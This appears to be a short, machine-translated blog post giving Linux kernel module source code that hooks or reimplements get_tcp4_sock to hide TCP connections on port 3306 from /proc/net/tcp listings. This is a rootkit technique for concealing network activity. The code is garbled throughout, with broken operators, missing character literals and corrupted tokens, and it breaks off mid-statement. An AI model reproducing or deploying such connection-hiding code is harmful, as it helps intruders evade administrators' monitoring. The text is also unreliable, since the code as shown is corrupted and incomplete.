Another way to hide network connections in Linux

You can directly hook the get_tcp4_sock function in inline, but you only need to implement the get_tcp4_sock function again, and then filter it. The Code is as follows:

# Include <linux/kernel. h>
# Include <linux/init. h>
# Include <linux/module. h>
# Include <linux/version. h>
# Include <linux/types. h>
# Include <linux/string. h>
# Include <linux/unistd. h>
# Include <linux/fs. h>
# Include <linux/kmod. h>
# Include <linux/file. h>
# Include <linux/sched. h>
# Include <linux/mm. h>
# Include <linux/slab. h>
# Include <linux/spinlock. h>
# Include <linux/socket. h>
# Include <linux/net. h>
# Include <linux/in. h>
# Include <linux/skbuff. h>
# Include <linux/ip. h>
# Include <linux/tcp. h>
# Include <net/sock. h>
# Include <asm/uaccess. h>
# Include <asm/unistd. h>
# Include <asm/termbits. h>
# Include <asm/ioctls. h>
# Include <linux/icmp. h>
# Include <linux/netdevice. h>
# Include <linux/netfilter. h>
# Include <linux/netfilter_00004.h>

MODULE_LICENSE ("GPL ");
MODULE_AUTHOR ("wzt ");

_ U32 wnps_in_aton (const char * str)
{
Unsigned long l;
Unsigned int val;
Int I;

L = 0;
For (I = 0; I <4; I ++ ){
L <= 8;
If (* str! = ){
Val = 0;
While (* str! = & * Str! = .){
Val * = 10;
Val + = * str-0;
Str ++;
}
L | = val;
If (* str! =)
Str ++;
}
}

Return (htonl (l ));
}

Void new_get_tcp4_sock (struct sock * sk, struct seq_file * f, int I, int * len)
{
Int timer_active;
Unsigned long timer_expires;
Struct tcp_sock * tp = tcp_sk (sk );
Const struct inet_connection_sock * icsk = inet_csk (sk );
Struct inet_sock * inet = inet_sk (sk );
_ Be32 dest = inet-> daddr;
_ Be32 src = inet-> rcv_saddr;
_ 2010destp = ntohs (inet-> dport );
_ 2010srcp = ntohs (inet-> sport );

Printk ("!! In new_get_tcp4_sock .");

If (icsk-> icsk_pending = ICSK_TIME_RETRANS ){
Timer_active = 1;
Timer_expires = icsk-> icsk_timeout;
} Else if (icsk-> icsk_pending = ICSK_TIME_PROBE0 ){
Timer_active = 4;
Timer_expires = icsk-> icsk_timeout;
} Else if (timer_pending (& sk-> sk_timer )){
Timer_active = 2;
Timer_expires = sk-> sk_timer.expires;
} Else {
Timer_active = 0;
Timer_expires = jiffies;
}

/*
If (src = wnps_in_aton ("127.0.0.1 ")){
Printk ("got 127.0.0.1 ");
Return;
}
*/
If (srcp = 3306 | destp = 3306 ){
Printk ("got 3306! ");
Seq_printf (f, "% 4d: % 08X: % 04X % 08X: % 04X % 02X % 08X: % 08X % 02X: % 08lX"
"% 08X % 5d % 8d % lu % d % p % lu % u % d % n ",
0, 0, 0, 0, 0, 0,
Tp-> write_seq-tp-> snd_una,
Sk-> sk_state = TCP_LISTEN? Sk-> sk_ack_backlog:
(Tp-> rcv_nxt-tp-> copied_seq ),
Timer_active,
Jiffies_to_clock_t (timer_expires-jiffies ),
Icsk-> icsk_retransmits,
Sock_ I _uid (sk ),
& Nb